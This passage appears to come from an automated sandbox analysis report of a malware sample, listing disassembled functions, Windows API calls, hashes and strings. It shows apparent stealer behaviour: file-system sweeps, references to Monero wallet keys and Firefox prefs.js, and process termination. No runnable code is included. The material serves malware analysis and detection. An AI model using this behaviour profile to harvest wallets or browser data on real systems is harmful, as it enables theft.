                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\%s
                                      • API String ID: 180737720-4073750446
                                      • Opcode ID: f06295ba96e640c057c47e59a428ee981fcc5e0266e1fe0322a406c41dbf33f5
                                      • Instruction ID: 8821a9f5de7f08a83581cca7ac7c1c3f90e8c4f24a87f789a8d726b8bc1fa42c
                                      • Opcode Fuzzy Hash: f06295ba96e640c057c47e59a428ee981fcc5e0266e1fe0322a406c41dbf33f5
                                      • Instruction Fuzzy Hash: 325147B1500218ABCB25EBB4DC89EEE737CFB54300F404688B69996044DB75AB89CF74
                                      Function 00D3EE20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • wsprintfA.USER32 ref: 00D3EE3E
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00D3EE55
                                      • StrCmpCA.SHLWAPI(?,00D51630), ref: 00D3EEAB
                                      • StrCmpCA.SHLWAPI(?,00D51634), ref: 00D3EEC1
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00D3F3AE
                                      • FindClose.KERNEL32(000000FF), ref: 00D3F3C3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\*.*
                                      • API String ID: 180737720-1013718255
                                      • Opcode ID: 319baddedba335ffb3925c20e54f83e24d0780f911aff957a424b2f69ec16097
                                      • Instruction ID: 47e3743fdf5343ce0a695dae58bc7d07cd94e8aecad64c24fb213cea9cf36693
                                      • Opcode Fuzzy Hash: 319baddedba335ffb3925c20e54f83e24d0780f911aff957a424b2f69ec16097
                                      • Instruction Fuzzy Hash: DFE1FE729511289BEB54FB64CCA2EEE7339EF54340F4045D9B50A62092EE306F89CF72
                                      Function 00D70098 Relevance: 17.4, Strings: 13, Instructions: 1151COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                                      • API String ID: 0-1562099544
                                      • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                      • Instruction ID: 3f5ecda417dcbeb1693c58f8a1fa27f3be389e281d727155e31aee8af694ab91
                                      • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                      • Instruction Fuzzy Hash: 61E276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                                      Function 00D3F7B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                        • Part of subcall function 00D4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00D4AC82
                                        • Part of subcall function 00D4AC30: lstrcat.KERNEL32(00000000), ref: 00D4AC92
                                        • Part of subcall function 00D4ACC0: lstrlen.KERNEL32(?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D4ACD5
                                        • Part of subcall function 00D4ACC0: lstrcpy.KERNEL32(00000000), ref: 00D4AD14
                                        • Part of subcall function 00D4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AD22
                                        • Part of subcall function 00D4ABB0: lstrcpy.KERNEL32(?,00D50E1A), ref: 00D4AC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00D516B0,00D50D97), ref: 00D3F81E
                                      • StrCmpCA.SHLWAPI(?,00D516B4), ref: 00D3F86F
                                      • StrCmpCA.SHLWAPI(?,00D516B8), ref: 00D3F885
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00D3FBB1
                                      • FindClose.KERNEL32(000000FF), ref: 00D3FBC3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID: prefs.js
                                      • API String ID: 3334442632-3783873740
                                      • Opcode ID: d606cf250da0940367987b1b30fdf377999c9eb153e95bc80d1e5b1f25b6bed9
                                      • Instruction ID: 8b18d71e396c19cb2acda3e2620a4426c58dd4b3fe4d67a4ac9f530007062af3
                                      • Opcode Fuzzy Hash: d606cf250da0940367987b1b30fdf377999c9eb153e95bc80d1e5b1f25b6bed9
                                      • Instruction Fuzzy Hash: 5FB122729401189BDB24FF64DD96FEE7379EF54300F0045A9A50A56181EF35AB48CFB2
                                      Function 01183254 Relevance: 15.4, Strings: 11, Instructions: 1629COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: 'U?$*auI$.]Y7$=`qu$@<+$F&>$IBh$MV]]$_wo[$:S}$jK
                                      • API String ID: 0-147113015
                                      • Opcode ID: a2cf0fff299b685a5f4b9b1a937b54fc4ce6c24c5522a4e7c4b2b35cdd6e83d5
                                      • Instruction ID: f2c0d259dd0a3e9faf92d4adb583b719945c2476f4a9e2395d0a37469388e02f
                                      • Opcode Fuzzy Hash: a2cf0fff299b685a5f4b9b1a937b54fc4ce6c24c5522a4e7c4b2b35cdd6e83d5
                                      • Instruction Fuzzy Hash: B0B218F360C204AFE3046E2DEC8567AFBE9EB98720F16453DEAC5C3744EA7558048693
                                      Function 00D31710 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00D5523C,?,?,?,00D552E4,?,?,00000000,?,00000000), ref: 00D31963
                                      • StrCmpCA.SHLWAPI(?,00D5538C), ref: 00D319B3
                                      • StrCmpCA.SHLWAPI(?,00D55434), ref: 00D319C9
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00D31D80
                                      • DeleteFileA.KERNEL32(00000000), ref: 00D31E0A
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00D31E60
                                      • FindClose.KERNEL32(000000FF), ref: 00D31E72
                                        • Part of subcall function 00D4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00D4AC82
                                        • Part of subcall function 00D4AC30: lstrcat.KERNEL32(00000000), ref: 00D4AC92
                                        • Part of subcall function 00D4ACC0: lstrlen.KERNEL32(?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D4ACD5
                                        • Part of subcall function 00D4ACC0: lstrcpy.KERNEL32(00000000), ref: 00D4AD14
                                        • Part of subcall function 00D4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AD22
                                        • Part of subcall function 00D4ABB0: lstrcpy.KERNEL32(?,00D50E1A), ref: 00D4AC15
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                      • String ID: \*.*
                                      • API String ID: 1415058207-1173974218
                                      • Opcode ID: 57b57b2679e4f2f6bf35707b3320de5683221251837e85f9952a7d52d6e8cb2f
                                      • Instruction ID: 505449d8ef3fb29e46824f18a7d009bc593b0c68ad48b578eff7b2cf4149045f
                                      • Opcode Fuzzy Hash: 57b57b2679e4f2f6bf35707b3320de5683221251837e85f9952a7d52d6e8cb2f
                                      • Instruction Fuzzy Hash: 6A121A769505289BDB29FB64CCA6AEE7379EF54300F4045E9B50A62091EF306B88CF71
                                      Function 00D3DF10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                        • Part of subcall function 00D4ACC0: lstrlen.KERNEL32(?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D4ACD5
                                        • Part of subcall function 00D4ACC0: lstrcpy.KERNEL32(00000000), ref: 00D4AD14
                                        • Part of subcall function 00D4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AD22
                                        • Part of subcall function 00D4ABB0: lstrcpy.KERNEL32(?,00D50E1A), ref: 00D4AC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00D50C32), ref: 00D3DF5E
                                      • StrCmpCA.SHLWAPI(?,00D515C0), ref: 00D3DFAE
                                      • StrCmpCA.SHLWAPI(?,00D515C4), ref: 00D3DFC4
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00D3E4E0
                                      • FindClose.KERNEL32(000000FF), ref: 00D3E4F2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                      • String ID: \*.*
                                      • API String ID: 2325840235-1173974218
                                      • Opcode ID: 1a70e71bc91827f85fae58798e1a71b465921301a17f9c075a8e0695ee6f6765
                                      • Instruction ID: 1f1822cc7145e52b0d0ddd8587fe8f9bceb684d1346f67ce146bffb3b0f79e3f
                                      • Opcode Fuzzy Hash: 1a70e71bc91827f85fae58798e1a71b465921301a17f9c075a8e0695ee6f6765
                                      • Instruction Fuzzy Hash: 28F1B9759505289BDB29FB64CDA6EEE7339EF54340F4045DAA40A62091EF306F88CF72
                                      Function 00D3DB80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                        • Part of subcall function 00D4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00D4AC82
                                        • Part of subcall function 00D4AC30: lstrcat.KERNEL32(00000000), ref: 00D4AC92
                                        • Part of subcall function 00D4ACC0: lstrlen.KERNEL32(?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D4ACD5
                                        • Part of subcall function 00D4ACC0: lstrcpy.KERNEL32(00000000), ref: 00D4AD14
                                        • Part of subcall function 00D4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AD22
                                        • Part of subcall function 00D4ABB0: lstrcpy.KERNEL32(?,00D50E1A), ref: 00D4AC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00D515A8,00D50BAF), ref: 00D3DBEB
                                      • StrCmpCA.SHLWAPI(?,00D515AC), ref: 00D3DC33
                                      • StrCmpCA.SHLWAPI(?,00D515B0), ref: 00D3DC49
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00D3DECC
                                      • FindClose.KERNEL32(000000FF), ref: 00D3DEDE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID:
                                      • API String ID: 3334442632-0
                                      • Opcode ID: a343413d82ae9b3ff5b6d083cf3fbac5932a9b52e547abbeda6dec243b7edc62
                                      • Instruction ID: 28bb93b2946d8f3dc044907221c48a64bf2a89414d71f3717d0d28c6ad966276
                                      • Opcode Fuzzy Hash: a343413d82ae9b3ff5b6d083cf3fbac5932a9b52e547abbeda6dec243b7edc62
                                      • Instruction Fuzzy Hash: 5D914272A001149BDB14FF74ED969ED733EEF94340F004569F94A96185EE34AB08CBB2
                                      Function 00D498E0 Relevance: 12.1, APIs: 8, Instructions: 55processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00D49905
                                      • Process32First.KERNEL32(00D39FDE,00000128), ref: 00D49919
                                      • Process32Next.KERNEL32(00D39FDE,00000128), ref: 00D4992E
                                      • StrCmpCA.SHLWAPI(?,00D39FDE), ref: 00D49943
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00D4995C
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00D4997A
                                      • CloseHandle.KERNEL32(00000000), ref: 00D49987
                                      • CloseHandle.KERNEL32(00D39FDE), ref: 00D49993
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                      • String ID:
                                      • API String ID: 2696918072-0
                                      • Opcode ID: 535db8d7a098ed20ecd486f32325b9e68f052a62abd2bfaf4207adc5234cd2c6
                                      • Instruction ID: f1b6a10717ca151d9129fc5a6d91aa91426dcd77a26a2d3aa36cf0977f8ce2be
                                      • Opcode Fuzzy Hash: 535db8d7a098ed20ecd486f32325b9e68f052a62abd2bfaf4207adc5234cd2c6
                                      • Instruction Fuzzy Hash: A8113375910208EBCB25DFA5DC48BDEB779BB48700F00458CF585A7284D779AB84CFA0
                                      Function 00D47D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                      Download Yara Rule
                                      APIs
